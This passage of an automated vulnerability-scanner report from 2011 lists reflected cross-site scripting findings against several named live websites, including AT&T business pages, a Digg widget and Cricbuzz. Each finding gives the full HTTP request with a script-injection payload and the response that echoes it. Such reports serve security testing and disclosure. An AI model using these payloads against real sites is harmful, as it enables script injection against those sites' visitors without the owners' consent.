The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5949b'%3balert(1)//02a670cbde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5949b';alert(1)//02a670cbde0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605/5949b'%3balert(1)//02a670cbde0ae-1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:54 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8897

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605/5949b';alert(1)//02a670cbde0ae-1';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1bd2893c
...[SNIP]...

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3ab'%3balert(1)//fe30191df11 was submitted in the tid parameter. This input was echoed as fb3ab';alert(1)//fe30191df11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605ae-1fb3ab'%3balert(1)//fe30191df11 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8896

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605ae-1fb3ab';alert(1)//fe30191df11';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1b907640c3.6
...[SNIP]...

7.36. http://usjobsresource.com/3 [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e48"><script>alert(1)</script>e6cfb5723ff was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3?s=31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff" />
...[SNIP]...

7.37. http://usjobsresource.com/3/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32f1f"><script>alert(1)</script>6df8703c622 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3/?s=31s-2100u32f1f"><script>alert(1)</script>6df8703c622 HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u32f1f"><script>alert(1)</script>6df8703c622" />
...[SNIP]...

7.38. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 24218<script>alert(1)</script>e84fc8187f6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=-781655937076164456%3A203; d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; imp_id=1f0886feeb8786a6bbd1a6e1e240cbe5d902a47b7a6b64c4656307739e35a482; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:30 GMT
Via: NS-CACHE: 100
Etag: "600917dcebe2f17e666a47431399dbfb32a9afc9"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 01 May 2011 23:35:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6", "diggs": 0});

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the GUID request parameter is copied into an HTML comment. The payload 3f483--><script>alert(1)</script>0979b4e1029 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:34:43 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:34:43 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LPNFFQCT4WHVHB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601853; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=38f57a3139fe3100e934be119a8bde04; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
=ProductSub-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 -->
...[SNIP]...

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 283a6"><script>alert(1)</script>97891412ffe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:20 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:20 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LZOJUPGBKPSHXB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610536; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=ecd6ef2ba3674bc7ffa69ff03589f6ed; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.17
Via: 1.1 12.120.79.17:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<link rel="canonical" href="http://www.business.att.com/enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/"/>
...[SNIP]...

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9cfc'-alert(1)-'062611d0003 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-securityb9cfc'-alert(1)-'062611d0003/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:02:29 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:02:29 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=ZIAJEFC04ES2VB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579685; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=2cfd5fa64eb3b601400f181ff3de6124; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.18
Via: 1.1 12.120.79.18:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<s'+'cript language="javascript" src="http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-securityb9cfc'-alert(1)-'062611d0003]">
...[SNIP]...

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba2"-alert(1)-"91dbea1c28a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security69ba2"-alert(1)-"91dbea1c28a/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:54 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:54 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=VYIV31SYKK2S1B4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610540; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=fc845523bb479e8fe404a8b911a72926; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.63
Via: 1.1 12.120.79.63:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
TTCampaign=EMPTY";
_cp_custom_array[n++]="ATTSource=null";
_cp_custom_array[n++]="ATTEBSegment=null";
_cp_custom_array[n++]="ATTECampaignID=null";
_cp_custom_array[n++]="ATTServicePort=network-security69ba2"-alert(1)-"91dbea1c28a";
_cp_custom_array[n++]="ATTCType=ProductSub-Category";
_cp_custom_array[n++]="ATTCValue=threat-vulnerability-management";
/** FR-ABS_0402 Remove Intellakey
_cp_cc='ATT';
_cp_pc='ATT101';
_cp_chc='ATT
...[SNIP]...

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the WT.srch request parameter is copied into an HTML comment. The payload d5e22--><script>alert(1)</script>9c70c127f7e was submitted in the WT.srch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:35:06 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:35:06 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=1YST0KTJBXSXPB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610337; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=faa58d0946d2d8a634695d2e0591c56e; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
b-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e -->
...[SNIP]...

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4bdf4--><script>alert(1)</script>c023ff8d913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:37:46 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:37:46 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=XYNLIASLF0LPVB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601953; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=19f0450799003a67ffb066dd0f0d8e8b; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 -->
...[SNIP]...

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5743<script>alert(1)</script>01a55c78f8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5743<script>alert(1)</script>01a55c78f8d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:27 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15660
X-Varnish: 542435555
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<strong> Unable to resolve the request "favicon.icoa5743<script>alert(1)</script>01a55c78f8d".</strong>
...[SNIP]...

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the background_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69b10%3balert(1)//368093ffe90 was submitted in the background_color parameter. This input was echoed as 69b10;alert(1)//368093ffe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff69b10%3balert(1)//368093ffe90&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

